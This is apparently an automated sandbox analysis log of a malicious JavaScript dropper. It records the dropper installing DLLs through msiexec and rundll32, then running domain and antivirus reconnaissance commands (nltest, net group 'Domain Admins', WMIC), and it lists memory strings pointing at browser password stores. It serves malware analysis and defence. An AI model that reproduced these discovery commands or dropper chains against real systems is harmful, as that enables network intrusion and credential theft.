Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801035BB94	6_3_000001801035BB94
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010377C14	6_3_0000018010377C14
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801033FC72	6_3_000001801033FC72
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010319CBC	6_3_0000018010319CBC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010340D18	6_3_0000018010340D18
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010385D68	6_3_0000018010385D68
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010339D94	6_3_0000018010339D94
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103A9D94	6_3_00000180103A9D94
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010368DF8	6_3_0000018010368DF8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801032FE38	6_3_000001801032FE38
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801031BEB8	6_3_000001801031BEB8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103AAE84	6_3_00000180103AAE84
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010367EE8	6_3_0000018010367EE8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103A0EC0	6_3_00000180103A0EC0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010371ECC	6_3_0000018010371ECC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801038AF20	6_3_000001801038AF20
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010359F68	6_3_0000018010359F68
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010317FD0	6_3_0000018010317FD0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010336038	6_3_0000018010336038
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801036F018	6_3_000001801036F018
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801034E074	6_3_000001801034E074
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010316078	6_3_0000018010316078
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801037A048	6_3_000001801037A048
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103570C0	6_3_00000180103570C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010384134	6_3_0000018010384134
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010370114	6_3_0000018010370114
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010380154	6_3_0000018010380154
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B1030	7_2_000001EF532B1030

Source: Joe Sandbox View	Dropped File: :wtfbbq (copy) 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\sharepoint\360total.dll 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
Source: Joe Sandbox View	Dropped File: C:\Windows\Installer\MSI181.tmp 1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180005348 appears 71 times
Source: C:\Windows\Installer\MSI181.tmp	Code function: String function: 005A325F appears 103 times
Source: C:\Windows\Installer\MSI181.tmp	Code function: String function: 005A3790 appears 39 times
Source: C:\Windows\Installer\MSI181.tmp	Code function: String function: 005A3292 appears 66 times

Source: Document_a51_19i793302-14b09981a5569-3684u8.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winJS@93/27@13/11

Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess,	5_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	5_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,	5_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	5_2_000000018008395A

Source: C:\Windows\Installer\MSI181.tmp

Code function: 3_2_00583860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

3_2_00583860

Source: C:\Windows\Installer\MSI181.tmp

Code function: 3_2_00584BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,

3_2_00584BA0

Source: C:\Windows\Installer\MSI181.tmp

Code function: 3_2_005845B0 LoadResource,LockResource,SizeofResource,

3_2_005845B0

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

5_2_0000000180049AEC

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3588:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8592:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF41638D872A10A065.TMP

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Installer\MSI181.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Installer\MSI181.tmp

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq

Source: rundll32.exe, rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr	Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, 00000006.00000003.2934807774.00000180103B5000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2933161054.00000180103B5000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr	Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';
Source: rundll32.exe, 00000006.00000003.2934807774.00000180103B5000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2933161054.00000180103B5000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: rundll32.exe, 00000006.00000003.2936562885.000001800FF54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Document_a51_19i793302-14b09981a5569-3684u8.js

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a51_19i793302-14b09981a5569-3684u8.js"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B0AF98778AC35F634802E620BDCA3C21
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI181.tmp "C:\Windows\Installer\MSI181.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\Installer\MSI181.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,12555166688129216027,17064817212319626723,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1952,i,10714614445797353568,16368385931931740060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B0AF98778AC35F634802E620BDCA3C21	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI181.tmp "C:\Windows\Installer\MSI181.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,12555166688129216027,17064817212319626723,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1952,i,10714614445797353568,16368385931931740060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
